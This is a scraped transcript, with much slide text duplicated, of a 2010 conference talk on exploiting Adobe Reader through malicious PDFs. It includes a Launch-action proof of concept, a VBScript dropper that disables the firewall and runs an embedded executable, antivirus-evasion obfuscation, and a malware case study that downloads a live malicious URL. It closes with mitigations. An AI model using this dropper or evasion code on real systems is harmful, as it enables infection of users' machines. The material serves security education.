Client Side Exploits using PDF
null0x00
6,496 views
77 slides
Oct 26, 2010
Slide 1 of 77
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
About This Presentation
Client Side Exploits using PDF by Ankur Bhargava & Tamaghna Basu @ null Banglore Meet, October, 2010
Slide Content
BY,
ANKUR BHARGAVA
(INFOSYS TECHNOLOGIES LIMITED)
TAMAGHNA BASU
(SECURITY RESEARCHER)
Client Side Exploits using PDF
C0C0N Security & Hacking
Conference
ANKUR BHARGAVA
(INFOSYS TECHNOLOGIES LIMITED)
TAMAGHNA BASU
(SECURITY RESEARCHER)
Client Side Exploits using PDF
C0C0N Security & Hacking
Conference
Contents
About
PDF
Launch
Action
Exploits
AcroJs
Exploits
Road
Ahead
Tools
and
References
About
Launch
Action
Exploits
AcroJs
Exploits
Road
Ahead
Tools
and
References
About PDF
• What is PDF?
• Incidents in the wild
• Why pdf attcks?
• PDF document structure
• What is PDF?
• Incidents in the wild
• Why pdf attcks?
• PDF document structure
Potentially Dangerous File / Penetration
Document Format
Stands for Adobe Portable Document Format
Exchange and manipulation of electronic data
reliable and platform independent
Has become most widespread and used document
description format throughout the world
Document Format
Stands for Adobe Portable Document Format
Exchange and manipulation of electronic data
reliable and platform independent
Has become most widespread and used document
description format throughout the world
Adobe PDF – As a programming language
PDF document is more than a powerful document
format
Has a complete programming language of its own
Dedicated to document creation and manipulation
Relatively strong execution features
PDF document is more than a powerful document
format
Has a complete programming language of its own
Dedicated to document creation and manipulation
Relatively strong execution features
Adobe PDF – Security Issues
2010: Still Continuing…
2010: Still Continuing…
M
a
r
c
h
A
p
r
il
M
a
y
J
u
n
e
M
a
r
c
h
A
p
r
il
M
a
y
J
u
n
e
Incidents in the wild
Jun 14 CVE-2010-1297 PDF Adobe 0-Day WEO from [email protected]
Jun 20 CVE-2010-1297 PDF Meeting agenda from [email protected]
Jun 21 CVE-2010-1297 PDF About the recent US-Japan Economic Relations
Jun 21 CVE-2010-1297 PDF Adobe 0-Day About the recent US-Japan Economic
Relations - with Poison Ivy
Jun 27 CVE-2009-0927 PDF Discussion on cross-strait maritime cooperation
Jul 6 CVE-2010-1297 PDF EPA's Water Sampling Report from spoofed
[email protected]
Jul 14 CVE-2009-4324 PDF President Obama's Detrimental Deadlines
Jun 14 CVE-2010-1297 PDF Adobe 0-Day WEO from [email protected]
Jun 20 CVE-2010-1297 PDF Meeting agenda from [email protected]
Jun 21 CVE-2010-1297 PDF About the recent US-Japan Economic Relations
Jun 21 CVE-2010-1297 PDF Adobe 0-Day About the recent US-Japan Economic
Relations - with Poison Ivy
Jun 27 CVE-2009-0927 PDF Discussion on cross-strait maritime cooperation
Jul 6 CVE-2010-1297 PDF EPA's Water Sampling Report from spoofed
[email protected]
Jul 14 CVE-2009-4324 PDF President Obama's Detrimental Deadlines
The Reign of Zeus:
Zeus (also known as Zbot, PRG, Wsnpoem, Gorhax
and Kneber) is a Trojan horse that steals banking
information by keystroke logging.
Found in July 2007 when it was used to steal
information from the United States Department of
Transportation. It became more widespread in
March 2009.
In June 2009, security company Prevx discovered
that Zeus had compromised over 74,000 FTP
accounts on websites of companies like: Bank of
America, NASA, Monster, ABC, Oracle, Cisco,
Amazon, BusinessWeek
ZeuS is sold in the criminal underground as a kit
for around $3000-$4000, and is likely the one
malware most utilized by criminals specializing in
financial fraud. ZeuS has evolved over time and
includes a full arsenal of information stealing .
Zeus (also known as Zbot, PRG, Wsnpoem, Gorhax
and Kneber) is a Trojan horse that steals banking
information by keystroke logging.
Found in July 2007 when it was used to steal
information from the United States Department of
Transportation. It became more widespread in
March 2009.
In June 2009, security company Prevx discovered
that Zeus had compromised over 74,000 FTP
accounts on websites of companies like: Bank of
America, NASA, Monster, ABC, Oracle, Cisco,
Amazon, BusinessWeek
ZeuS is sold in the criminal underground as a kit
for around $3000-$4000, and is likely the one
malware most utilized by criminals specializing in
financial fraud. ZeuS has evolved over time and
includes a full arsenal of information stealing .
The Reign of Zeus
A recent
breakthrough in
spreading Zeus via
PDF files threatens to
further the spread of
Zeus. The pdf file
(detected as
Exploit.JS.Pdfka.bui)
contained an exploit
for the CVE-2010-
0188 vulnerability -
buffer overflow –
manifests itself when
the field containing
the image is
accessed.
CVE-2010-0188 exploits statistics 2010
A recent
breakthrough in
spreading Zeus via
PDF files threatens to
further the spread of
Zeus. The pdf file
(detected as
Exploit.JS.Pdfka.bui)
contained an exploit
for the CVE-2010-
0188 vulnerability -
buffer overflow –
manifests itself when
the field containing
the image is
accessed.
CVE-2010-0188 exploits statistics 2010
Popular in malwaredomainlist.com
Apple iPhone / iPad / iPod Code Execution
and Sandbox Bypass
VUPEN ID - VUPEN/ADV-2010-1992
Release date - 2010-08-03
It is caused by a memory corruption
error when processing Compact Font
Format (CFF) data within a PDF
document, which could be exploited by
attackers to execute arbitrary code by
tricking a user into visiting a specially
crafted web page using Mobile Safari
and Sandbox Bypass
VUPEN ID - VUPEN/ADV-2010-1992
Release date - 2010-08-03
It is caused by a memory corruption
error when processing Compact Font
Format (CFF) data within a PDF
document, which could be exploited by
attackers to execute arbitrary code by
tricking a user into visiting a specially
crafted web page using Mobile Safari
Why PDF
Popularity and usability
Flexibility, platform
independent, rich text
Trust level is high on pdf –
static piece of information
Rich api, easy to exploit /
misuse
Dominance of Adobe reader,
huge scope for attack
Popularity and usability
Flexibility, platform
independent, rich text
Trust level is high on pdf –
static piece of information
Rich api, easy to exploit /
misuse
Dominance of Adobe reader,
huge scope for attack
PDF document structure
The general
structure of a PDF
file is composed of
the following code
components:
header, body, cross-
reference (xref)
table, and trailer, as
shown in figure 1.
The general
structure of a PDF
file is composed of
the following code
components:
header, body, cross-
reference (xref)
table, and trailer, as
shown in figure 1.
PDF Document Structure
PDF Header
Objects
Trailer
B
o
d
y
Cross reference
Table
PDF Header
Objects
Trailer
B
o
d
y
Cross reference
Table
Launch Action
• Launch Action Api
• Some Examples
• Evading Antivirus
• With embedded EXE
• Launch Action Api
• Some Examples
• Evading Antivirus
• With embedded EXE
Launch Action Vulnerability
A launch action launches an application or opens or prints a document.
Following are the action dictionary entries specific to this type of action.
ENTRIES
S :Name
Required) The type of action that this dictionary describes; shall be Launch for
a launch action.
F: File specification
(Required if none of the entries Win, Mac, or Unix is present) The application
that shall be launched or the document that shall be opened or printed. If this
entry is absent and the conforming reader does not understand any of the
alternative entries, it shall do nothing.
Win : dictionary
(Optional) A dictionary containing Windows-specific launch parameters.
A launch action launches an application or opens or prints a document.
Following are the action dictionary entries specific to this type of action.
ENTRIES
S :Name
Required) The type of action that this dictionary describes; shall be Launch for
a launch action.
F: File specification
(Required if none of the entries Win, Mac, or Unix is present) The application
that shall be launched or the document that shall be opened or printed. If this
entry is absent and the conforming reader does not understand any of the
alternative entries, it shall do nothing.
Win : dictionary
(Optional) A dictionary containing Windows-specific launch parameters.
Launch Action Vulnerability
PARAMETERS
F : byte string
(Required) The file name of the application that shall be launched or
the document that shall be opened or printed, in standard Windows
pathname format. If the name string includes a backslash character
(\), the backslash shall itself be preceded by a backslash. This value
shall be a simple string; it is not a file specification.
P : byte string
(Optional) A parameter string that shall be passed to the application
designated by the F entry. This entry shall be omitted if F
designates a document.
PARAMETERS
F : byte string
(Required) The file name of the application that shall be launched or
the document that shall be opened or printed, in standard Windows
pathname format. If the name string includes a backslash character
(\), the backslash shall itself be preceded by a backslash. This value
shall be a simple string; it is not a file specification.
P : byte string
(Optional) A parameter string that shall be passed to the application
designated by the F entry. This entry shall be omitted if F
designates a document.
Launch Action Vulnerability
Open command prompt Open website
Open command prompt Open website
Launch Action Vulnerability
Open notepad.exe
Open notepad.exe
Launch Action Vulnerability
Launch Action Vulnerability
Changing the message
Changing the message
Launch Action Vulnerability
Confidential Data!! If You are Authorized Click on
'Open'. Check 'Do Not Show This Message Again' to
avoid this dialog next time
Confidential Data!! If You are Authorized Click on
'Open'. Check 'Do Not Show This Message Again' to
avoid this dialog next time
Launch Action Vulnerability
Launch Action in 9.3.3
Launch Action Vulnerability
Evading Antivirus by Changing the format
You can take any other
PDF data type and give
it a number by
wrapping it in "obj" and
"endobj". Then later on,
when you want to use
that chunk of data, you
can reference it, by
number, with the "R"
operator.
These two examples are
equivalent to Acrobat
2 0 obj
(Hello World)
Endobj
3 0 obj
<<
/Example 2 0 R
>>
Endobj
3 0 obj
<<
/Example (Hello
World)
>>
endobj
You can take any other
PDF data type and give
it a number by
wrapping it in "obj" and
"endobj". Then later on,
when you want to use
that chunk of data, you
can reference it, by
number, with the "R"
operator.
These two examples are
equivalent to Acrobat
2 0 obj
(Hello World)
Endobj
3 0 obj
<<
/Example 2 0 R
>>
Endobj
3 0 obj
<<
/Example (Hello
World)
>>
endobj
Evading Antivirus
What You Can Leave Out
All Page data
All Whitespace, except for End-Of-Line after comments
The version number part of %PDF-1.1
The %%EOF
The xref table
And thus also startxref
Most Object /Types
So what's actually required?
%PDF-anything, but if the file is too confusing for Acrobat, you need at least
the first number. Like %PDF-1.
A trailer with a /Root dictionary for the Catalog
A /Pages dictionary, but this can be empty, just as long as it's a dictionary
type.
An /OpenAction if you want to launch your Javascript upon file open.
The Javascript Action.
What You Can Leave Out
All Page data
All Whitespace, except for End-Of-Line after comments
The version number part of %PDF-1.1
The %%EOF
The xref table
And thus also startxref
Most Object /Types
So what's actually required?
%PDF-anything, but if the file is too confusing for Acrobat, you need at least
the first number. Like %PDF-1.
A trailer with a /Root dictionary for the Catalog
A /Pages dictionary, but this can be empty, just as long as it's a dictionary
type.
An /OpenAction if you want to launch your Javascript upon file open.
The Javascript Action.
Evading Antivirus
%PDF-1.
trailer<</Root<</Pages<<>>/
OpenAction<</S/Launch/Wi
n<</F(cmd.exe)/P<0A0A0A0
A0A0A0A0A4E6F74653A205
468697320697320612073656
3757265205044462E20546F2
076696577207468652073656
37572656420636F6E74656E7
420706C6561736520636C696
36B2074686520224F70656E
2220627574746F6E2062656C
6F772E>>>>>>>>>
%PDF-1.
trailer<</Root<</Pages<<>>/
OpenAction<</S/Launch/Wi
n<</F(cmd.exe)/P<0A0A0A0
A0A0A0A0A4E6F74653A205
468697320697320612073656
3757265205044462E20546F2
076696577207468652073656
37572656420636F6E74656E7
420706C6561736520636C696
36B2074686520224F70656E
2220627574746F6E2062656C
6F772E>>>>>>>>>
Evading Antivirus
POC: Launching an Embedded exe
Step 1 : Embed the hex content of the exe in a
vbscript which extracts it out to the file system and
runs it.
Step 2 : Embed that vbscript in the pdf file as
comments.
Step 3 : Launch cmd.exe and create another script
which extracts out the main vbscript from the pdf
and run them both.
Step 1 : Embed the hex content of the exe in a
vbscript which extracts it out to the file system and
runs it.
Step 2 : Embed that vbscript in the pdf file as
comments.
Step 3 : Launch cmd.exe and create another script
which extracts out the main vbscript from the pdf
and run them both.
Step 1 : Embed the hex content of the exe in a
vbscript
Dim b,bl
Function c(d)
c=chr(d)
End Function
b=Array(c(77),c(90),c(144),c(0),c(3),c(0), c(0)....,"")
bl = 3072
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.OpenTextFile(“helpme.exe", 2, True)
For i = 0 To bl
f.write(b(i))
Next
f.close()
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "netsh firewall set opmode disable", 0, True
WshShell.Run "helpme.exe", 0, False
WshShell.Run "taskkill /IM cmd.exe /F", 0, False
Hex content of
the exe as a
character array
vbscript
Dim b,bl
Function c(d)
c=chr(d)
End Function
b=Array(c(77),c(90),c(144),c(0),c(3),c(0), c(0)....,"")
bl = 3072
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.OpenTextFile(“helpme.exe", 2, True)
For i = 0 To bl
f.write(b(i))
Next
f.close()
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "netsh firewall set opmode disable", 0, True
WshShell.Run "helpme.exe", 0, False
WshShell.Run "taskkill /IM cmd.exe /F", 0, False
Hex content of
the exe as a
character array
Step 2 : Embed the vbscript in the pdf file as
comments
%'SS
%Dim b,bl;Set WshShell = Function c(d);c=chr(d);End
Function;b=Array(c(77),c(90),c(144),c(0),.....,"");bl = 3072;Set fso =
CreateObject("Scripting.FileSystemObject");Set f =
fso.OpenTextFile("helpme.exe", 2, True);For i = 0 To
bl;f.write(b(i));Next;f.close(); Set WshShell =
WScript.CreateObject("WScript.Shell") ;WshShell.Run "netsh
firewall set opmode disable", 0, True;WshShell.Run "helpme.exe",
0, False;WshShell.Run "taskkill /IM cmd.exe /F", 0, False
%'EE
6 0 obj
[/PDF /Text]
endobj
comments
%'SS
%Dim b,bl;Set WshShell = Function c(d);c=chr(d);End
Function;b=Array(c(77),c(90),c(144),c(0),.....,"");bl = 3072;Set fso =
CreateObject("Scripting.FileSystemObject");Set f =
fso.OpenTextFile("helpme.exe", 2, True);For i = 0 To
bl;f.write(b(i));Next;f.close(); Set WshShell =
WScript.CreateObject("WScript.Shell") ;WshShell.Run "netsh
firewall set opmode disable", 0, True;WshShell.Run "helpme.exe",
0, False;WshShell.Run "taskkill /IM cmd.exe /F", 0, False
%'EE
6 0 obj
[/PDF /Text]
endobj
Step 3 : Launch cmd.exe and create another
script
/c echo Set
fso=CreateObject("Scripting.FileSystemObject") >
execute.vbs && echo Set
f=fso.OpenTextFile("EmbeddedExePoC.pdf", 1, True) >>
execute.vbs && echo pf=f.ReadAll >> execute.vbs &&
echo s=InStr(pf,"'SS") >> execute.vbs && echo
e=InStr(pf,"'EE") >> execute.vbs && echo s=Mid(pf,s,e-
s) >> execute.vbs && echo Set
z=fso.OpenTextFile("toexecute.vbs", 2, True) >>
execute.vbs && echo s = Replace(s,"%","") >>
execute.vbs && echo s = Replace(s,";",vbcrlf) >>
execute.vbs && echo z.Write(s) >> execute.vbs &&
execute.vbs && toexecute.vbs
script
/c echo Set
fso=CreateObject("Scripting.FileSystemObject") >
execute.vbs && echo Set
f=fso.OpenTextFile("EmbeddedExePoC.pdf", 1, True) >>
execute.vbs && echo pf=f.ReadAll >> execute.vbs &&
echo s=InStr(pf,"'SS") >> execute.vbs && echo
e=InStr(pf,"'EE") >> execute.vbs && echo s=Mid(pf,s,e-
s) >> execute.vbs && echo Set
z=fso.OpenTextFile("toexecute.vbs", 2, True) >>
execute.vbs && echo s = Replace(s,"%","") >>
execute.vbs && echo s = Replace(s,";",vbcrlf) >>
execute.vbs && echo z.Write(s) >> execute.vbs &&
execute.vbs && toexecute.vbs
Generated VBScript
Set fso=CreateObject("Scripting.FileSystemObject")
Set f=fso.OpenTextFile("EmbeddedExePoC.pdf", 1, True)
pf=f.ReadAll
s=InStr(pf,"'SS")
e=InStr(pf,"'EE")
s=Mid(pf,s,e-s)
Set z=fso.OpenTextFile("toexecute.vbs", 2, True)
s = Replace(s,"%","")
s = Replace(s,";",vbcrlf)
z.Write(s)
Set fso=CreateObject("Scripting.FileSystemObject")
Set f=fso.OpenTextFile("EmbeddedExePoC.pdf", 1, True)
pf=f.ReadAll
s=InStr(pf,"'SS")
e=InStr(pf,"'EE")
s=Mid(pf,s,e-s)
Set z=fso.OpenTextFile("toexecute.vbs", 2, True)
s = Replace(s,"%","")
s = Replace(s,";",vbcrlf)
z.Write(s)
AcroJS
• AcroJs Api
• Vulnerable Api’s
• Obfuscation Techniques
• Case Study
• AcroJs Api
• Vulnerable Api’s
• Obfuscation Techniques
• Case Study
AcroJS
•Acrobat JavaScript is the cross-platform scripting
language of the Adobe® Acrobat® family of products.
• Through JavaScript extensions, the viewer application
and its plug-ins expose much of their functionality to
document authors, form designers, and plug-in
developers.
•This functionality includes the following features,
–Processing forms within the document
–Batch processing collections of PDF documents
–Developing and maintaining online collaboration schemes
–Communicating with local databases
–Controlling multimedia events
•Acrobat JavaScript is the cross-platform scripting
language of the Adobe® Acrobat® family of products.
• Through JavaScript extensions, the viewer application
and its plug-ins expose much of their functionality to
document authors, form designers, and plug-in
developers.
•This functionality includes the following features,
–Processing forms within the document
–Batch processing collections of PDF documents
–Developing and maintaining online collaboration schemes
–Communicating with local databases
–Controlling multimedia events
JavaScript Actions
•A JavaScript action causes a script to be compiled and executed by the
JavaScript interpreter.
•Depending on the nature of the script, various interactive form fields in the
document may update their values or change their visual ap-pearances.
PARAMETERS
/S
Type - name
(Required) The type of action that this dictionary describes; must be
JavaScript for a JavaScript action.
/JS
Type - text string or text stream
(Required) A text string or text stream containing the JavaScript script to be
exe-cuted.
•A JavaScript action causes a script to be compiled and executed by the
JavaScript interpreter.
•Depending on the nature of the script, various interactive form fields in the
document may update their values or change their visual ap-pearances.
PARAMETERS
/S
Type - name
(Required) The type of action that this dictionary describes; must be
JavaScript for a JavaScript action.
/JS
Type - text string or text stream
(Required) A text string or text stream containing the JavaScript script to be
exe-cuted.
launchURLAlertbox
Acrojs examples
Acrojs examples
Acrojs examples
Acrojs examples
Vulnerable APIs
•getIcons() [CVE-2009-0927]
–Stack-based buffer overflow in Adobe Reader and Adobe Acrobat 9
before 9.1, 8 before 8.1.3 , and 7 before 7.1.1 allows remote attackers to
execute arbitrary code via a crafted argument to the getIcon method of a
Collab object, a different vulnerability than CVE-2009-0658.
•Util.printf() [CVE-2008-2992][CVE-2008-1104]
–Stack-based buffer overflow in Adobe Acrobat and Reader 8.1.2 and
earlier allows remote attackers to execute arbitrary code via a PDF file
that calls the util.printf JavaScript function with a crafted format string
argument, a related issue to CVE-2008-1104.
–Stack-based buffer overflow in Foxit Reader before 2.3 build 2912 allows
user-assisted remote attackers to execute arbitrary code via a crafted
PDF file, related to the util.printf JavaScript function and floating point
specifiers in format strings.
•getIcons() [CVE-2009-0927]
–Stack-based buffer overflow in Adobe Reader and Adobe Acrobat 9
before 9.1, 8 before 8.1.3 , and 7 before 7.1.1 allows remote attackers to
execute arbitrary code via a crafted argument to the getIcon method of a
Collab object, a different vulnerability than CVE-2009-0658.
•Util.printf() [CVE-2008-2992][CVE-2008-1104]
–Stack-based buffer overflow in Adobe Acrobat and Reader 8.1.2 and
earlier allows remote attackers to execute arbitrary code via a PDF file
that calls the util.printf JavaScript function with a crafted format string
argument, a related issue to CVE-2008-1104.
–Stack-based buffer overflow in Foxit Reader before 2.3 build 2912 allows
user-assisted remote attackers to execute arbitrary code via a crafted
PDF file, related to the util.printf JavaScript function and floating point
specifiers in format strings.
Vulnerable APIs
•getAnnots() [CVE-2009-1492]
–The getAnnots Doc method in the JavaScript API in Adobe Reader
and Acrobat 9.1, 8.1.4, 7.1.1, and earlier allows remote attackers to
cause a denial of service (memory corruption) or execute arbitrary
code via a PDF file that contains an annotation, and has an
OpenAction entry with JavaScript code that calls this method with
crafted integer arguments.
•customDictionaryOpen() [CVE-2009-1493]
–The customDictionaryOpen spell method in the JavaScript API in
Adobe Reader 9.1, 8.1.4, 7.1.1, and earlier on Linux and UNIX
allows remote attackers to cause a denial of service (memory
corruption) or execute arbitrary code via a PDF file that triggers a
call to this method with a long string in the second argument.
•getAnnots() [CVE-2009-1492]
–The getAnnots Doc method in the JavaScript API in Adobe Reader
and Acrobat 9.1, 8.1.4, 7.1.1, and earlier allows remote attackers to
cause a denial of service (memory corruption) or execute arbitrary
code via a PDF file that contains an annotation, and has an
OpenAction entry with JavaScript code that calls this method with
crafted integer arguments.
•customDictionaryOpen() [CVE-2009-1493]
–The customDictionaryOpen spell method in the JavaScript API in
Adobe Reader 9.1, 8.1.4, 7.1.1, and earlier on Linux and UNIX
allows remote attackers to cause a denial of service (memory
corruption) or execute arbitrary code via a PDF file that triggers a
call to this method with a long string in the second argument.
Vulnerable APIs
•Doc.media.newPlayer [CVE-2009-4324]
–Use-after-free vulnerability in the Doc.media.newPlayer method in
Multimedia.api in Adobe Reader and Acrobat 9.x before 9.3, and 8.x
before 8.2 on Windows and Mac OS X, allows remote attackers to
execute arbitrary code via a crafted PDF file using ZLib compressed
streams, as exploited in the wild in December 2009.
•Collab.collectEmailInfo [CVE-2007-5659]
–Multiple buffer overflows in Adobe Reader and Acrobat 8.1.1 and
earlier allow remote attackers to execute arbitrary code via a PDF file
with long arguments to unspecified JavaScript methods. NOTE: this
issue might be subsumed by CVE-2008-0655.
•Doc.media.newPlayer [CVE-2009-4324]
–Use-after-free vulnerability in the Doc.media.newPlayer method in
Multimedia.api in Adobe Reader and Acrobat 9.x before 9.3, and 8.x
before 8.2 on Windows and Mac OS X, allows remote attackers to
execute arbitrary code via a crafted PDF file using ZLib compressed
streams, as exploited in the wild in December 2009.
•Collab.collectEmailInfo [CVE-2007-5659]
–Multiple buffer overflows in Adobe Reader and Acrobat 8.1.1 and
earlier allow remote attackers to execute arbitrary code via a PDF file
with long arguments to unspecified JavaScript methods. NOTE: this
issue might be subsumed by CVE-2008-0655.
Obfuscation Techniques
Why?
To make analysis more difficult
To avoid detection by virus scanners
Ways?
Using javascript Obfuscation
Using Pdf Obfuscations(Filters)
Why?
To make analysis more difficult
To avoid detection by virus scanners
Ways?
Using javascript Obfuscation
Using Pdf Obfuscations(Filters)
Javascript Obfuscations : Unlearn Coding
Ethics
Ethics
Distorting format
Normal Code Obfuscated Code
function execute(data, time)
{
Timelag=5000;
if (time > Timelag)
{
// some code
}
}
function overflow(hex, loop)
{
for (i=0;i<loop;i++)
{
hex = hex + hex;
}
}
function overflow(hex, loop){for
(i=0;i<loop;i++){hex = hex + hex;}}
function overflow(hex, loop) {for
i=0;i<loop;i++){hex = hex + hex;}}
Normal Code Obfuscated Code
function execute(data, time)
{
Timelag=5000;
if (time > Timelag)
{
// some code
}
}
function overflow(hex, loop)
{
for (i=0;i<loop;i++)
{
hex = hex + hex;
}
}
function overflow(hex, loop){for
(i=0;i<loop;i++){hex = hex + hex;}}
function overflow(hex, loop) {for
i=0;i<loop;i++){hex = hex + hex;}}
Obfuscating Identifiers
Normal Code Obfuscated Code
function execute(data, time)
{
Timelag=5000;
if (time > Timelag)
{
// some code
}
}
function overflow(hex, loop)
{
for (i=0;i<loop;i++)
{
hex = hex + hex;
}
}
function aeiou(lIlIIlI, O0OOOO0OO000OO)
{
WWMWMMWMWMWMW=5000;
if (O0OOOO0OO000OO >
WWMWMWMWMWMW)
{
// some code
}
}
function aimpq(xxwmnnx, pqrtxw)
{
for (dqweaa=0; dqweaa < pqrtxw; dqweaa ++)
{
xxwmnnx = xxwmnnx + xxwmnnx;;
}
}
Normal Code Obfuscated Code
function execute(data, time)
{
Timelag=5000;
if (time > Timelag)
{
// some code
}
}
function overflow(hex, loop)
{
for (i=0;i<loop;i++)
{
hex = hex + hex;
}
}
function aeiou(lIlIIlI, O0OOOO0OO000OO)
{
WWMWMMWMWMWMW=5000;
if (O0OOOO0OO000OO >
WWMWMWMWMWMW)
{
// some code
}
}
function aimpq(xxwmnnx, pqrtxw)
{
for (dqweaa=0; dqweaa < pqrtxw; dqweaa ++)
{
xxwmnnx = xxwmnnx + xxwmnnx;;
}
}
Obfuscating Identifiers – Even Worse
Differentiating with number of underscore characters
function _____(____,__________)
{
______________=5000;
if (__________>______________)
{
// some code
}
}
function ___(_______, ______)
{
for(________________=0; ________________<______;
________________ ++)
{
_______ = _______ + _______;
}
}
Differentiating with number of underscore characters
function _____(____,__________)
{
______________=5000;
if (__________>______________)
{
// some code
}
}
function ___(_______, ______)
{
for(________________=0; ________________<______;
________________ ++)
{
_______ = _______ + _______;
}
}
Obfuscating Identifiers – Even Worse
Differentiating with number of underscore characters
function _____(____,__________){______________=5000;if
(__________>______________){// some code}}function ___(_______,
______){for(________________=0; ________________<______;
________________ ++){_______ = _______ + _______;}}
Differentiating with number of underscore characters
function _____(____,__________){______________=5000;if
(__________>______________){// some code}}function ___(_______,
______){for(________________=0; ________________<______;
________________ ++){_______ = _______ + _______;}}
Chain of Eval
Normal Code Obfuscated code
app.alert(“c0c0n”) func="eval";
one='app.alert("c0c0n")';
two=eval(one);
three=eval(two);
eval(func(three));
Normal Code Obfuscated code
app.alert(“c0c0n”) func="eval";
one='app.alert("c0c0n")';
two=eval(one);
three=eval(two);
eval(func(three));
Splitting Javascript
Normal code Obfuscated Code
app.alert(“hello world”); Rt=“);”;
Td=“ert(\”hel”;
Ab=“ap”;
Qw=“ld\””;
Kg=“p.al”;
Gh=“lo wor”;
Eval(“hh=Ab+Kg+Td+Gh+Qw+Rt”);
Eval(hh);
Normal code Obfuscated Code
app.alert(“hello world”); Rt=“);”;
Td=“ert(\”hel”;
Ab=“ap”;
Qw=“ld\””;
Kg=“p.al”;
Gh=“lo wor”;
Eval(“hh=Ab+Kg+Td+Gh+Qw+Rt”);
Eval(hh);
Callee Trick
Function accesses its own source and uses it as a key to decrypt code
or data
function decrypt(cypher)
{
var key = arguments.callee.toString();
for (var i = 0; i < cypher.length; i++)
{
plain = key.charCodeAt(i) ^ cypher.charCodeAt(i);
}
...
}
Function accesses its own source and uses it as a key to decrypt code
or data
function decrypt(cypher)
{
var key = arguments.callee.toString();
for (var i = 0; i < cypher.length; i++)
{
plain = key.charCodeAt(i) ^ cypher.charCodeAt(i);
}
...
}
Pdf obfuscations
Using Filters for streams.
Most common encoding techniques -
ASCIIHEXDecode,
ASCII85Decode,
LZWDecode,
FlateDecode,
RunLengthDecode
Using Filters for streams.
Most common encoding techniques -
ASCIIHEXDecode,
ASCII85Decode,
LZWDecode,
FlateDecode,
RunLengthDecode
Case Study
Malware found from - www.malwaredomainlist.com
File link www.bigiqwars.ru/ppp/exp/pdf.php?
user=admin&pdf_acces=on
Added on – 29
th
july 2010
Malware found from - www.malwaredomainlist.com
File link www.bigiqwars.ru/ppp/exp/pdf.php?
user=admin&pdf_acces=on
Added on – 29
th
july 2010
Virus total Reports 5/42(11.90%)
Analysis
STEP-1
WGET www.bigiqwars.ru/ppp/exp/pdf.php?
user=admin&pdf_acces=on
WGET www.bigiqwars.ru/ppp/exp/pdf.php?
user=admin&pdf_acces=on
STEP-2
Behavioral Analysis
Environment
• By using vm image
• Filemon,Processmon,Regmon,TCPView
Results
•Under Process ‘AcroRD32.exe’ Was trying to connect
to remote site http://bigiqwars.ru/ppp/exe.php?
spl=PDF (newPlayer)&user=admin&exe_acces=on
Behavioral Analysis
Environment
• By using vm image
• Filemon,Processmon,Regmon,TCPView
Results
•Under Process ‘AcroRD32.exe’ Was trying to connect
to remote site http://bigiqwars.ru/ppp/exe.php?
spl=PDF (newPlayer)&user=admin&exe_acces=on
STEP-3
Pdfid.py
Pdfid.py
STEP-4
Static/Code Analysis
Static/Code Analysis
Word Editor
Decoded the script
Formatted using jsbeautifier.org
Replacing with meaningful identifiers and
removing unnecessary comments
removing unnecessary comments
Replacing ‘X’ from parameter
Shellcode Analysis
Connecting to…
http://bigiqwars.ru/ppp/exe.php?spl=PDF (newPlayer)&user=admin&exe_acces=on
Connecting to…
http://bigiqwars.ru/ppp/exe.php?spl=PDF (newPlayer)&user=admin&exe_acces=on
Road Ahead
• Mitigations
• Adobe’s security Measures
• Future Exploit methods
• Mitigations
• Adobe’s security Measures
• Future Exploit methods
How can we protect ourselves
•Enable automatic updates: it sounds simple, but you will need to turn it on
in the software settings to make it happen by default.
•Disable PDF browser integration: most browsers will open PDFs without
asking. An infected PDF will deliver its payload without warning, hiding in
the background.
•Always install the latest patch/update, even for older Adobe product
versions.
•Disable Javascript
•Uncheck ‘Allow non-PDF gile attachments with external applications’ to
prevent launch action vulnerability.
•PDF alternatives such as Foxit are worthwhile, as long as auto updates are
turned on, however alternative programs are just as vulnerable to malware
as they gain popularity.
•Enable automatic updates: it sounds simple, but you will need to turn it on
in the software settings to make it happen by default.
•Disable PDF browser integration: most browsers will open PDFs without
asking. An infected PDF will deliver its payload without warning, hiding in
the background.
•Always install the latest patch/update, even for older Adobe product
versions.
•Disable Javascript
•Uncheck ‘Allow non-PDF gile attachments with external applications’ to
prevent launch action vulnerability.
•PDF alternatives such as Foxit are worthwhile, as long as auto updates are
turned on, however alternative programs are just as vulnerable to malware
as they gain popularity.
Road Ahead
Focus Less on javascript exploits
Attackers focusing more on embedded objects inside
pdf i.e flash
Adobe to introduce sandboxing to limit Reader
exploits
Focus Less on javascript exploits
Attackers focusing more on embedded objects inside
pdf i.e flash
Adobe to introduce sandboxing to limit Reader
exploits
Tools And References
Tools used
Malzilla
Mozilla addon
javascript deobfescator by Wladimir Palant
Vmware Player
Sysinternal tools
Processmon,filemon,regmon,tcpview
WinHex
HexEdit
Malzilla
Mozilla addon
javascript deobfescator by Wladimir Palant
Vmware Player
Sysinternal tools
Processmon,filemon,regmon,tcpview
WinHex
HexEdit
References
www.malwaredomainlist.com
www.adobe.com/
www.bigiqwars.ru/ppp/exp/pdf.php?user=admin&pdf_acces=on
www.blog.didierstevens.com
www.jsbeautifier.org
http://research.globalthoughtz.com
http://www.zdnet.com/
http://www.scansafe.com/
http://www.computerworld.com/s/article/9176117/
http://www.darkreading.com/
http://www.virustotal.com/
http://recon.cx/
http://www.blog.zynamics.com
www.malwaredomainlist.com
www.adobe.com/
www.bigiqwars.ru/ppp/exp/pdf.php?user=admin&pdf_acces=on
www.blog.didierstevens.com
www.jsbeautifier.org
http://research.globalthoughtz.com
http://www.zdnet.com/
http://www.scansafe.com/
http://www.computerworld.com/s/article/9176117/
http://www.darkreading.com/
http://www.virustotal.com/
http://recon.cx/
http://www.blog.zynamics.com
References continued..
http://www.marketwire.com/
http://www.symantec.com/
http://www.securelist.com/en/analysis
http://contagiodump.blogspot.com/
http://www.f-secure.com/
http://www.securelist.com/
http://www.secureworks.com/
http://en.wikipedia.org/
http://www.malwaredomainlist.com/
http://blogs.adobe.com/
http://blog.fireeye.com/
http://intrepidusgroup.com/
http://www.vupen.com
http://www.marketwire.com/
